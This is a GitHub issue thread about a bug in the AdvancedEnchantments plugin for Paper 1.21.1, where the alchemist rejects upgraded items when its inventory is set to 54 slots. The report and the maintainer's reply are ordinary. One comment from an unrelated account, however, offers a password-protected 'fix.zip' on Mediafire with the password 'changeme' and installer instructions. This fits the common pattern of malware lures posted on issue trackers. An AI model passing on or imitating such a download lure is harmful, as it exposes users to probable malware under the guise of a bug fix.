### ISSUE TITLE
ALCHEMIST BROKEN ON PAPER 1.21.1 INVENTORY SIZE 54

### ISSUE THREAD

**Issue by PARARP** [GC-spigot/AdvancedEnchantments#4591]
### Describe the bug

When the inventory is set to 54 on the alchemist i am unable to receive the upgraded item. It says the alchemist does not accept this item. But i can see the proper upgraded item in the item preview. when using the exact same ui but on 27 Slots it works just fine.

### How to reproduce

Set inventory size to 54 for alchemist. NO ERRORS OCCUR IN CONSOLE! Paper 1.21.1  AE 9.10.7

### Screenshots / Videos

![Screenshot_2024-08-24_144926](https://github.com/user-attachments/assets/99e3a449-3461-4020-95b0-0d2806fa369d)

### "/ae plinfo" link

https://paste.md-5.net/esakigehom

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ThomasWega** [comment]
Should be fixed in the next update. Thanks for reporting
